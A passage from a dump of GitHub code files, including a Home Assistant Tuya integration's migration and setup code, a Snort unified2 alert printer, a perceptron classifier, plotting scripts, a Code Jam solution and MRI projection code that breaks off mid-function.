{}\n entry.version = 10\n\n if entry.version <= 10:\n conf = entry.data | entry.options\n entry.data = {\n CONF_DEVICE_ID: conf[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: conf[CONF_LOCAL_KEY],\n CONF_HOST: conf[CONF_HOST],\n CONF_TYPE: conf[CONF_TYPE],\n CONF_PROTOCOL_VERSION: \"auto\",\n CONF_POLL_ONLY: False,\n }\n entry.options = {}\n entry.version = 11\n\n if entry.version <= 11:\n # Migrate unique ids of existing entities to new format\n device_id = entry.unique_id\n conf_file = get_config(entry.data[CONF_TYPE])\n if conf_file is None:\n _LOGGER.error(\n NOT_FOUND,\n entry.data[CONF_TYPE],\n )\n return False\n\n @callback\n def update_unique_id12(entity_entry):\n \"\"\"Update the unique id of an entity entry.\"\"\"\n old_id = entity_entry.unique_id\n platform = entity_entry.entity_id.split(\".\", 1)[0]\n e = conf_file.primary_entity\n if e.name:\n expect_id = f\"{device_id}-{slugify(e.name)}\"\n else:\n expect_id = device_id\n if e.entity != platform or expect_id != old_id:\n for e in conf_file.secondary_entities():\n if e.name:\n expect_id = f\"{device_id}-{slugify(e.name)}\"\n else:\n expect_id = device_id\n if e.entity == platform and expect_id == old_id:\n break\n\n if e.entity == platform and expect_id == old_id:\n new_id = e.unique_id(device_id)\n if new_id != old_id:\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n\n await async_migrate_entries(hass, entry.entry_id, update_unique_id12)\n entry.version = 12\n\n if entry.version <= 12:\n # Migrate unique ids of existing entities to new format taking into\n # account device_class if name is missing.\n device_id = entry.unique_id\n conf_file = get_config(entry.data[CONF_TYPE])\n if conf_file is None:\n _LOGGER.error(\n NOT_FOUND,\n entry.data[CONF_TYPE],\n )\n return False\n\n @callback\n def update_unique_id13(entity_entry):\n \"\"\"Update the unique id of an entity entry.\"\"\"\n old_id = entity_entry.unique_id\n platform = entity_entry.entity_id.split(\".\", 1)[0]\n # if unique_id ends with platform name, then this may have\n # changed with the addition of device_class.\n if old_id.endswith(platform):\n e = conf_file.primary_entity\n if e.entity != platform or e.name:\n for e in conf_file.secondary_entities():\n if e.entity == platform and not e.name:\n break\n if e.entity == platform and not e.name:\n new_id = e.unique_id(device_id)\n if new_id != old_id:\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n else:\n replacements = {\n \"sensor_co2\": \"sensor_carbon_dioxide\",\n \"sensor_co\": \"sensor_carbon_monoxide\",\n \"sensor_pm2_5\": \"sensor_pm25\",\n \"sensor_pm_10\": \"sensor_pm10\",\n \"sensor_pm_1_0\": \"sensor_pm1\",\n \"sensor_pm_2_5\": \"sensor_pm25\",\n \"sensor_tvoc\": \"sensor_volatile_organic_compounds\",\n \"sensor_current_humidity\": \"sensor_humidity\",\n \"sensor_current_temperature\": \"sensor_temperature\",\n }\n for suffix, new_suffix in replacements.items():\n if old_id.endswith(suffix):\n e = conf_file.primary_entity\n if e.entity != platform or e.name:\n for e in conf_file.secondary_entities():\n if e.entity == platform and not e.name:\n break\n if e.entity == platform and not e.name:\n new_id = e.unique_id(device_id)\n if new_id.endswith(new_suffix):\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n\n await async_migrate_entries(hass, entry.entry_id, update_unique_id13)\n entry.version = 13\n\n return True\n\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):\n _LOGGER.debug(\n \"Setting up entry for device: %s\",\n get_device_id(entry.data),\n )\n config = {**entry.data, **entry.options, \"name\": entry.title}\n setup_device(hass, config)\n device_conf = get_config(entry.data[CONF_TYPE])\n if device_conf is None:\n _LOGGER.error(NOT_FOUND, config[CONF_TYPE])\n return False\n\n entities = set()\n e = device_conf.primary_entity\n entities.add(e.entity)\n for e in device_conf.secondary_entities():\n entities.add(e.entity)\n\n await hass.config_entries.async_forward_entry_setups(entry, entities)\n\n entry.add_update_listener(async_update_entry)\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):\n _LOGGER.debug(\"Unloading entry for device: %s\", get_device_id(entry.data))\n config = entry.data\n data = hass.data[DOMAIN][get_device_id(config)]\n device_conf = get_config(config[CONF_TYPE])\n if device_conf is None:\n _LOGGER.error(NOT_FOUND, config[CONF_TYPE])\n return False\n\n entities = {}\n e = device_conf.primary_entity\n if e.config_id in data:\n entities[e.entity] = True\n for e in device_conf.secondary_entities():\n if e.config_id in data:\n entities[e.entity] = True\n\n for e in entities:\n await hass.config_entries.async_forward_entry_unload(entry, e)\n\n await async_delete_device(hass, config)\n del hass.data[DOMAIN][get_device_id(config)]\n\n return True\n\n\nasync def async_update_entry(hass: HomeAssistant, entry: ConfigEntry):\n _LOGGER.debug(\"Updating entry for device: %s\", get_device_id(entry.data))\n await async_unload_entry(hass, entry)\n await async_setup_entry(hass, entry)\n","repo_name":"make-all/tuya-local","sub_path":"custom_components/tuya_local/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13549,"program_lang":"python","lang":"en","doc_type":"code","stars":613,"dataset":"github-code","pt":"61"} +{"seq_id":"13055954190","text":"from maxent_sampling import *\nfrom formosa_utils import mean_ci\n\ndef test_maxent_motif():\n trials = 1000\n N, L, desired_ic = 10,10,10\n motifs = [maxent_motif(N,L,desired_ic) for i in trange(trials)]\n lb, ub = mean_ci(map(motif_ic,motifs))\n assert lb < desired_ic < ub\n\ndef test_spoof_maxent_motifs():\n trials = 1000\n motif = ['CGGTGAACTA',\n 'CGGTGTGCGA',\n 'CGCTGTGCTG',\n 'CGGGATGCAA',\n 'CACGCTACGA',\n 'CGCTATGCTA',\n 'CGGTTGGCTA',\n 'CGGCGTGCTA',\n 'CGGTATATTG',\n 'CGGGTTGCGA']\n given_ic = motif_ic(motif) # ~ 9.05 bits\n motifs = spoof_maxent_motifs(motif,trials)\n lb, ub = mean_ci(map(motif_ic,motifs))\n assert lb < given_ic < ub\n","repo_name":"poneill/formosa","sub_path":"tests/test_maxent_sampling.py","file_name":"test_maxent_sampling.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29274561365","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport os.path\n\nif sys.argv[0] == __file__:\n sys.path.insert(\n 0, os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\")))\n\nimport time\nimport logging\n\ntry:\n import argparse\nexcept ImportError as err:\n from idstools.compat.argparse import argparse\n\nfrom idstools import unified2\nfrom idstools import maps\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\nLOG = logging.getLogger()\n\nproto_map = {\n 1: \"ICMP\",\n 6: \"TCP\",\n 17: \"UDP\",\n}\n\ndef print_time(sec, usec):\n tt = time.localtime(sec)\n return \"%04d/%02d/%02d-%02d:%02d:%02d.%06d\" % (\n tt.tm_year, tt.tm_mon, tt.tm_mday, tt.tm_hour, tt.tm_min, tt.tm_sec,\n usec)\n\ndef print_event(event, msgmap, classmap):\n msg_entry = msgmap.get(event[\"generator-id\"], event[\"signature-id\"])\n if msg_entry:\n msg = msg_entry[\"msg\"]\n else:\n msg = \"Snort Event\"\n\n class_entry = classmap.get(event[\"classification-id\"])\n if class_entry:\n class_description = class_entry[\"description\"]\n else:\n class_description = str(event[\"classification-id\"])\n\n proto = proto_map.get(event[\"protocol\"], str(event[\"protocol\"]))\n\n print(\"%s [**] [%d:%d:%d] %s [**] [Classification: %s] [Priority: %d] {%s} %s:%d -> %s:%d\" % (\n print_time(event[\"event-second\"], event[\"event-microsecond\"]),\n event[\"generator-id\"],\n event[\"signature-id\"],\n event[\"signature-revision\"],\n msg,\n class_description,\n event[\"priority\"],\n proto,\n event[\"source-ip\"],\n event[\"sport-itype\"],\n event[\"destination-ip\"],\n event[\"dport-icode\"],\n ))\n\ndef load_from_snort_conf(snort_conf, classmap, msgmap):\n snort_etc = os.path.dirname(snort_conf)\n\n classification_config = os.path.join(snort_etc, \"classification.config\")\n if os.path.exists(classification_config):\n LOG.debug(\"Loading %s.\", classification_config)\n classmap.load_from_file(open(classification_config))\n\n genmsg_map = os.path.join(snort_etc, \"gen-msg.map\")\n if os.path.exists(genmsg_map):\n LOG.debug(\"Loading %s.\", genmsg_map)\n msgmap.load_generator_map(open(genmsg_map))\n\n sidmsg_map = os.path.join(snort_etc, \"sid-msg.map\")\n if os.path.exists(sidmsg_map):\n LOG.debug(\"Loading %s.\", sidmsg_map)\n msgmap.load_signature_map(open(sidmsg_map))\n\ndef main():\n\n msgmap = maps.SignatureMap()\n classmap = maps.ClassificationMap()\n\n parser = argparse.ArgumentParser(\n fromfile_prefix_chars='@')\n parser.add_argument(\n \"-C\", dest=\"classification_path\", metavar=\"\",\n help=\"path to classification config\")\n parser.add_argument(\n \"-S\", dest=\"sidmsgmap_path\", metavar=\"\",\n help=\"path to sid-msg.map\")\n parser.add_argument(\n \"-G\", dest=\"genmsgmap_path\", metavar=\"\",\n help=\"path to gen-msg.map\")\n parser.add_argument(\n \"--snort-conf\", dest=\"snort_conf\", metavar=\"\",\n help=\"attempt to load classifications and map files based on the \"\n \"location of the snort.conf\")\n parser.add_argument(\n \"--directory\", metavar=\"\",\n help=\"spool directory (eg: /var/log/snort)\")\n parser.add_argument(\n \"--prefix\", metavar=\"\",\n help=\"spool filename prefix (eg: unified2.log)\")\n parser.add_argument(\n \"--bookmark\", action=\"store_true\", default=False,\n help=\"enable bookmarking\")\n parser.add_argument(\n \"--follow\", action=\"store_true\", default=False,\n help=\"follow files/continuous mode (spool mode only)\")\n parser.add_argument(\n \"filenames\", nargs=\"*\")\n args = parser.parse_args()\n\n if args.snort_conf:\n load_from_snort_conf(args.snort_conf, classmap, msgmap)\n\n if args.classification_path:\n classmap.load_from_file(\n open(os.path.expanduser(args.classification_path)))\n if args.genmsgmap_path:\n msgmap.load_generator_map(open(os.path.expanduser(args.genmsgmap_path)))\n if args.sidmsgmap_path:\n msgmap.load_signature_map(open(os.path.expanduser(args.sidmsgmap_path)))\n\n if msgmap.size() == 0:\n LOG.warning(\"WARNING: No alert message map entries loaded.\")\n else:\n LOG.info(\"Loaded %s rule message map entries.\", msgmap.size())\n\n if classmap.size() == 0:\n LOG.warning(\"WARNING: No classifications loaded.\")\n else:\n LOG.info(\"Loaded %s classifications.\", classmap.size())\n\n if args.directory and args.prefix:\n reader = unified2.SpoolEventReader(\n directory=args.directory,\n prefix=args.prefix,\n follow=args.follow,\n bookmark=args.bookmark)\n\n for event in reader:\n print_event(event, msgmap, classmap)\n\n elif args.filenames:\n reader = unified2.FileEventReader(*args.filenames)\n for event in reader:\n print_event(event, msgmap, classmap)\n\n else:\n parser.print_help()\n return 1\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"jasonish/py-idstools","sub_path":"idstools/scripts/u2fast.py","file_name":"u2fast.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"61"} +{"seq_id":"4706468631","text":"from functools import partial\nimport math\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib.colors import Normalize\nimport matplotlib.pyplot as plt\nimport strafevis.strafe_stats\nfrom matplotlib import cm\nfrom matplotlib.colors import Colormap\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\nclass AngleMap(Colormap):\n def __init__(self, accels, max_accel=None, min_accel=None):\n self.accels = accels\n self.points = len(self.accels)\n if min_accel is not None:\n self.min_accel = min_accel\n else:\n self.min_accel = np.min(accels)\n if max_accel is not None:\n self.max_accel = max_accel\n else:\n self.max_accel = np.max(accels)\n Colormap.__init__(self, None, 255)\n\n def get_accel(self, val):\n val *= self.points\n val = int(val)\n return self.accels[val]\n\n def __call__(self, X, alpha=None, bytes=None):\n rgba = np.zeros(shape=(len(X), 4))\n\n for index, val in enumerate(X):\n accel = self.get_accel(val)\n rgba[index,3] = 1\n\n if accel < 0:\n accel = max(accel, self.min_accel)\n rgba[index,0] = accel / self.min_accel\n elif accel > 0:\n accel = min(accel, self.max_accel)\n rgba[index,1] = accel / self.max_accel\n\n return rgba\n\ndef animate_plot_to_pictures(min_speed, max_speed, pictures):\n axcolor = 'lightgoldenrodyellow'\n axspeed = plt.axes([0.125, 0.05, 0.65, 0.03], facecolor=axcolor)\n sspeed = Slider(axspeed, 'Speed', 0, max_speed, valinit=0, valstep=1)\n\n for i in range(pictures):\n speed = 1.0 * i / (pictures-1) * max_speed + min_speed\n accels, rads = strafevis.strafe_stats.get_stats(720, strafevis.strafe_stats.StatType.ACCEL, speed=speed)\n display_axes = plt.subplot(1, 1, 1, polar=True)\n norm = mpl.colors.Normalize(0.0, 2 * np.pi)\n cmap = AngleMap(accels)\n\n cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap,\n norm=norm,\n orientation='horizontal')\n\n # aesthetics - get rid of border and axis labels\n cb.outline.set_visible(False)\n display_axes.set_axis_off()\n sspeed.set_val(speed)\n plt.savefig('pic_%04d.png' % i)\n\ndef plot():\n accels, rads = strafevis.strafe_stats.get_stats(1000, strafevis.strafe_stats.StatType.ACCEL, speed=100)\n display_axes = plt.subplot(1, 1, 1, polar=True)\n norm = mpl.colors.Normalize(0.0, 2 * np.pi)\n cmap = AngleMap(accels)\n\n cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap,\n norm=norm,\n orientation='horizontal')\n\n # aesthetics - get rid of border and axis labels\n cb.outline.set_visible(False)\n display_axes.set_axis_off()\n\n def update(val):\n accels, rads = strafevis.strafe_stats.get_stats(1000, strafevis.strafe_stats.StatType.ACCEL, speed=sspeed.val)\n cmap = AngleMap(accels)\n cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap,\n norm=norm,\n orientation='horizontal')\n\n axcolor = 'lightgoldenrodyellow'\n axspeed = plt.axes([0.125, 0.05, 0.65, 0.03], facecolor=axcolor)\n sspeed = Slider(axspeed, 'Speed', 0, 1000.0, valinit=320, valstep=1)\n sspeed.on_changed(update)\n\n plt.show() # Replace with plt.savefig if you want to save a file\n","repo_name":"fabianod/strafevis","sub_path":"strafevis/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22309005558","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport itertools as it\nimport numpy as np\nfrom .label_mapper import LabelMapper\n\nclass Perceptron(object):\n \"\"\"A perceptron classifier.\n\n This class implements methods common to all perceptron variants, but cannot\n be used by itself. Always use derived classes instead.\n \"\"\"\n prune_limit = 0.0001\n\n _feature_extractor = None\n _w = None\n\n # for sequence-based prediction:\n _left_context_template = \"__BEGIN_{0}__\"\n _right_context_template = \"__END_{0}__\"\n _initial_history_template = \"__BEGIN_TAG_{0}__\"\n _left_context_size = 0\n _left_context = []\n _right_context = []\n _initial_history = []\n\n def __init__(self, iterations=5, learning_rate=1, averaged=True, \\\n sequenced=False, feature_extractor=None, log_to=None, \\\n progress_func=None, pruning=True):\n self.averaged = averaged\n self.sequenced = sequenced\n self.feature_extractor = feature_extractor\n self.iterations = iterations\n self._label_mapper = LabelMapper()\n self.learning_rate = learning_rate\n self.log_to = log_to\n self.progress_func = progress_func\n self.pruning = pruning\n\n def _log(self, text):\n if self.log_to is not None:\n self.log_to.write(text)\n self.log_to.write(\"\\n\")\n\n def _progress(self, value):\n if self._progress_func is not None:\n self._progress_func(value + self._running_total)\n\n @property\n def feature_count(self):\n if self._feature_extractor is not None:\n return self._feature_extractor.feature_count\n return self._feature_count\n\n @feature_count.setter\n def feature_count(self, value):\n if self._feature_extractor is not None:\n raise AttributeError((\"cannot set feature_count manually \"\n \"when using a feature_extractor\"))\n self._feature_count = value\n\n @property\n def feature_extractor(self):\n return self._feature_extractor\n\n @feature_extractor.setter\n def feature_extractor(self, obj):\n self._feature_extractor = obj\n if obj is not None:\n if self.sequenced:\n self._set_context_attributes(obj)\n self._feature_extractor.sequenced = self.sequenced\n\n @property\n def sequenced(self):\n return self._sequenced\n\n @sequenced.setter\n def sequenced(self, status):\n self._sequenced = status\n if self._feature_extractor is not None:\n self._feature_extractor.sequenced = status\n\n @property\n def progress_func(self):\n return self._progress_func\n\n @progress_func.setter\n def progress_func(self, value):\n if not (callable(value) or value is None):\n raise ValueError(\"progress_func must be callable or None\")\n self._progress_func = value\n\n def train(self, x, y, seed=1):\n \"\"\"Train the perceptron on independent data points.\n\n Parameters:\n x - A list of data points or feature vectors, or (if\n sequenced) a list of data point/feature vector sequences\n y - A list of correct class labels\n \"\"\"\n if self.sequenced:\n train_func = self._perform_train_iteration_sequenced\n else:\n train_func = self._perform_train_iteration_independent\n\n (x, y) = self._preprocess_train(x, y)\n self.reset_weights()\n self._running_total = 0\n all_w = []\n\n for iteration in range(self.iterations):\n # random permutation\n np.random.seed(seed)\n permutation = np.random.permutation(len(x))\n seed += 1\n\n # training\n (correct, total) = train_func(x, y, permutation)\n self._running_total += total\n accuracy = 1.0 * correct / total\n self._log(\"Iteration {0:2}: accuracy {1:.4f}\".format(iteration, accuracy))\n if self.averaged and self.iterations > 1:\n all_w.append(copy.deepcopy(self._w))\n\n if self.averaged and self.iterations > 1:\n self._log(\"Averaging weights...\")\n self._w = self.average_weights(all_w)\n\n if self.pruning:\n self._log(\"Pruning weights...\")\n self.prune_weights()\n\n def average_weights(self, all_w):\n if self.sequenced: # check if feature count changed between iterations\n for w in all_w:\n self._resize_weights(w)\n return sum(all_w) / len(all_w)\n\n def predict_all(self, x):\n \"\"\"Predict the class labels of a given dataset (= list of data points/sequences).\n\n The prediction function itself must be implemented by derived classes.\n \"\"\"\n return [self.predict(y) for y in x]\n\n def predict_all_nbest(self, x, n=1):\n \"\"\"Predict the n-best class labels of a given dataset (= list of data\n points/sequences).\n\n The prediction function itself must be implemented by derived classes.\n \"\"\"\n return [self.predict_nbest(y, n=n) for y in x]\n\n def print_weights(self):\n \"\"\"Print the learned weights in a human-readable format.\n\n Should be overridden by the specific perceptron implementations.\n \"\"\"\n print(self._w)\n\n def prune_weights(self):\n \"\"\"Prune the learned weights.\n\n Perceptron implementations can use this, e.g., to remove zero-valued\n features which don't contribute anything to the model.\n \"\"\"\n pass\n\n ############################################################################\n #### Serialization via pickle ##############################################\n ############################################################################\n\n def __getstate__(self):\n return {\n 'averaged': self.averaged,\n 'sequenced': self.sequenced,\n 'feature_extractor': self._feature_extractor,\n 'iterations': self.iterations,\n 'label_mapper': self._label_mapper,\n 'learning_rate': self.learning_rate,\n 'weights': self._w\n }\n\n def __setstate__(self, state):\n self.averaged = state['averaged']\n self.sequenced = state['sequenced']\n self.feature_extractor = state['feature_extractor']\n self.iterations = state['iterations']\n self._label_mapper = state['label_mapper']\n self.learning_rate = state['learning_rate']\n self._w = state['weights']\n\n ############################################################################\n #### Functions to be implemented by derived classes ########################\n ############################################################################\n\n def predict(self, x):\n \"\"\"Predict the class label of a given data point or sequence.\n \"\"\"\n raise NotImplementedError(\"predictor functionality not implemented\")\n\n def predict_nbest(self, x, n=1):\n \"\"\"Predict the n-best class labels of a given data point or sequence.\n \"\"\"\n raise NotImplementedError(\"n-best predictor functionality not implemented\")\n\n def reset_weights(self):\n \"\"\"Reset learned weights.\n \"\"\"\n raise NotImplementedError(\"reset_weights function not implemented\")\n\n def _resize_weights(self, w):\n \"\"\"Resize weights dynamically, if needed.\n \"\"\"\n raise NotImplementedError(\"_resize_weights function not implemented\")\n\n def _perform_train_iteration_independent(self, x, y, permutation):\n raise NotImplementedError(\"training functionality not implemented\")\n\n def _perform_train_iteration_sequenced(self, x, y, permutation):\n raise NotImplementedError(\"training functionality not implemented\")\n\n ############################################################################\n #### Helper functions for sequenced prediction #############################\n ############################################################################\n\n def _set_context_attributes(self, obj):\n \"\"\"Set context attributes from an object providing context size,\n typically the feature extractor.\n\n Required for sequence-based prediction only.\n \"\"\"\n (left_context_size, right_context_size) = obj.context_size\n self._left_context, self._right_context, self._initial_history = [], [], []\n self._left_context_size = left_context_size\n for i in range(left_context_size):\n self._left_context.append(self._left_context_template.format(i))\n self._initial_history.append(self._initial_history_template.format(i))\n for j in range(right_context_size):\n self._right_context.append(self._right_context_template.format(j))\n\n def _initialize_sequence(self, seq):\n \"\"\"Prepare a sequence of data points for sequence-based prediction.\n\n Pads the sequence with dummy context, if required, and prepares the\n prediction history.\n \"\"\"\n padded_seq = self._left_context + seq + self._right_context\n history = self._initial_history[:]\n startpos = self._left_context_size\n return (padded_seq, history, startpos)\n","repo_name":"mbollmann/perceptron","sub_path":"mmb_perceptron/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":9197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26694937574","text":"'''\r\n Linear Regression\r\n Rumus umum : y = m*x + b\r\n\r\n Program by prokoding\r\n'''\r\nfrom statistics import mean\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\n\r\nstyle.use('ggplot')\r\n\r\n#data yang sudah kita punya\r\njam = np.array([1, 1.5, 2, 2.5, 3, 4, 5, 6, 7.5],dtype=np.float64)\r\nipk = np.array([2, 2.5, 3, 3.3, 3.4, 3.5, 3.7, 3.9, 4],dtype=np.float64)\r\n\r\nclass SimpleReg:\r\n\r\n def __init__(self, x, y):\r\n self.jam = x\r\n self.ipk = y\r\n\r\n def start(self):\r\n m = ( ( (mean(self.jam) * mean(self.ipk)) - mean(self.jam * self.ipk)) /\r\n ((mean(self.jam)**2) - mean(self.jam**2) ) )\r\n \r\n b = mean(self.ipk) - m * mean(self.jam)\r\n\r\n return m, b\r\n\r\n def squared_error(self, ipk_linear):\r\n return sum((ipk_linear - self.ipk)**2)\r\n\r\n def check_corr(self, ipk_linear):\r\n ipk_mean = []\r\n for i in self.ipk:\r\n ipk_mean.append(mean(self.ipk))\r\n se_best_fit = self.squared_error(ipk_linear)\r\n se_mean_original = self.squared_error(ipk_mean)\r\n return 1-(se_best_fit / se_mean_original)\r\n\r\n#menggunakan classifier Simple Regression yang sudah dibuat\r\nclf = SimpleReg(jam, ipk)\r\n#mendapatkan nilai m dan b\r\nm, b = clf.start()\r\n#membuat garis berdasarkan rumus y = mX + b\r\nreg_line = []\r\nfor x in jam:\r\n reg_line.append(m*x + b)\r\n\r\n#membuat prediksi berapa ipk nya jika belajar 0.5 jam perhari\r\nprediksi_jam = 0.5\r\nprediksi_ipk = m * prediksi_jam + b\r\nprint('Jika belajar selama ',prediksi_jam,' jam sehari maka ipk yang akan di dapat : ',round(prediksi_ipk,2))\r\n\r\n#mendapatkan nilai keterhubungan\r\ncorrelation = clf.check_corr(reg_line)\r\nprint('Keterhubungan antara lama belajar dengan ipk yang baik adalah : ',round(correlation,2)*100,'%')\r\n\r\n#membuat visualisasi prediksi dengan titik berwarna biru\r\nplt.scatter(prediksi_jam, prediksi_ipk,color='b')\r\n\r\n#membuat visualisasi data yang tersedia\r\nplt.scatter(jam,ipk,color = 'g')\r\n\r\n#membuat garis linear atau best fit slope\r\nplt.plot(jam, reg_line)\r\nplt.xlabel('Lama belajar')\r\nplt.ylabel('IPK')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"rafimchmd/Linear-Regression-1-Variabel","sub_path":"linear_reg_ipk.py","file_name":"linear_reg_ipk.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23559062001","text":"def getNextLargestTidy(s, length):\n curr = int(s[0])\n first = True\n idx = -1\n res = ''\n for i, n in enumerate(s[1:]):\n n = int(n)\n if n == curr and first:\n idx = i\n first = False\n if n < curr:\n if first:\n idx = i\n digit = int(s[idx]) - 1\n res = s[:idx] + str(digit) + '9' * (length - idx - 1)\n break\n if i == length - 2:\n res = s\n break\n curr = n\n res = res.lstrip('0') or '0'\n return res\n\n\ncases = int(input())\nfor c in range(1, cases + 1):\n s = input()\n length = len(s)\n res = ''\n if length < 2:\n res = s\n else:\n res = getNextLargestTidy(s, length)\n print(\"Case #{}: {}\".format(c, res))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3596.py","file_name":"3596.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6606380726","text":"import argparse\nimport nibabel as nb\nimport numpy as np\nimport os\nimport time\nimport torch\nfrom copy import deepcopy\nimport h5py, hdf5plugin\nfrom util import create_train_idxs\n\n\ndef direct_project(y, normalizationmode, nostd=False, anon=False):\n train_ids, _ = create_train_idxs(395)\n if anon:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask_defaced.nii\").get_fdata()\n else:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n mask = torch.Tensor(mask)\n \n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:].astype(np.float32)\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:].astype(np.float32)\n y_z = (y-mean)/(1.0 if nostd else std)\n residual = deepcopy(y_z)\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n for ii,i in enumerate(train_ids):\n print(f\"{ii},{i}\")\n xi_z = torch.Tensor((x[i].astype(np.float32)-mean)/(1.0 if nostd else std))\n xi_norm = torch.norm(xi_z*mask)\n coef = (residual*xi_z*mask).sum()/xi_norm\n print(coef)\n residual = residual - coef * xi_z/xi_norm\n #print(np.linalg.norm(residual))\n return y_z - residual, residual\n\ndef pca_project(y, normalizationmode, nostd=False):\n train_ids, _ = create_train_idxs(395)\n #train_ids = train_ids[:10]\n #kernelrow = compute_kernelrow(y, normalizationmode, nostd)\n kernelrow = compute_kernelrow_local(y, normalizationmode, nostd)\n print(kernelrow)\n with h5py.File(f\"localkernel_{normalizationmode}{'_nostd' if nostd else ''}.h5\", \"r\") as hfout:\n kernel = torch.Tensor(hfout['kernel'][0,0,0])\n kernel = kernel[train_ids,:][:,train_ids]\n eps = kernel.diagonal().mean()/10\n coefrow = torch.matmul(kernelrow[0,0,0], torch.inverse(kernel + eps*torch.eye(kernel.shape[-1])))\n projection = 0*y\n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n y_z = (y-mean)/(1.0 if nostd else std)\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n for ii,i in enumerate(train_ids):\n print(coefrow[0,ii])\n print(ii)\n projection += coefrow[0,ii] * (x[i].astype(np.float32)-mean)/(1.0 if nostd else std)\n return projection, y_z - projection\n\ndef pca_project_test(test_ids, cuda=False):\n train_ids, _ = create_train_idxs(395)\n with h5py.File(f\"localkernel_z.h5\", \"r\") as hfout:\n kernel = torch.Tensor(hfout['kernel'][0,0,0])\n if cuda: kernel.cuda()\n kernelrows = kernel[test_ids,:][:,train_ids]\n kernel = kernel[train_ids,:][:,train_ids]\n eps = kernel.diagonal().mean()/10\n epseye = torch.eye(kernel.shape[-1])\n if cuda: epseye.cuda()\n coefrows = torch.matmul(kernelrows, torch.inverse(kernel + eps*epseye))\n print(coefrows)\n residuals = torch.zeros(len(test_ids),9,192,224,192)\n if cuda: residuals.cuda()\n with h5py.File(f\"icov_x_z.h5\", \"r\") as hfout:\n mean = torch.Tensor(np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:])\n std = torch.Tensor(np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:])\n if cuda:\n mean.cuda()\n std.cuda()\n print(\"loading h5 file\")\n with h5py.File(f\"x_z.h5\", \"r\") as hf:\n x = hf['x']\n print(\"loading test data\")\n for ii,i in enumerate(test_ids):\n print(ii)\n xi = torch.Tensor(x[i].astype(np.float32))\n if cuda: xi.cuda()\n residuals[ii] = (xi-mean)/std\n print(\"updating residuals\")\n for ii,i in enumerate(train_ids):\n xi = torch.Tensor(x[i].astype(np.float32))\n if cuda: xi.cuda()\n print(ii)\n residuals -= coefrows[:,ii].view(-1,1,1,1,1) * (xi-mean)/std\n #print((residuals**2).sum())\n return residuals\n\ndef compute_kernelrow_local(y, normalizationmode, nostd=False, anon=False):\n if anon:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask_defaced.nii\").get_fdata()\n else:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n nmask = mask.sum()\n mask = torch.Tensor(mask)\n train_ids, _ = create_train_idxs(395)\n #train_ids = train_ids[:10]\n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = 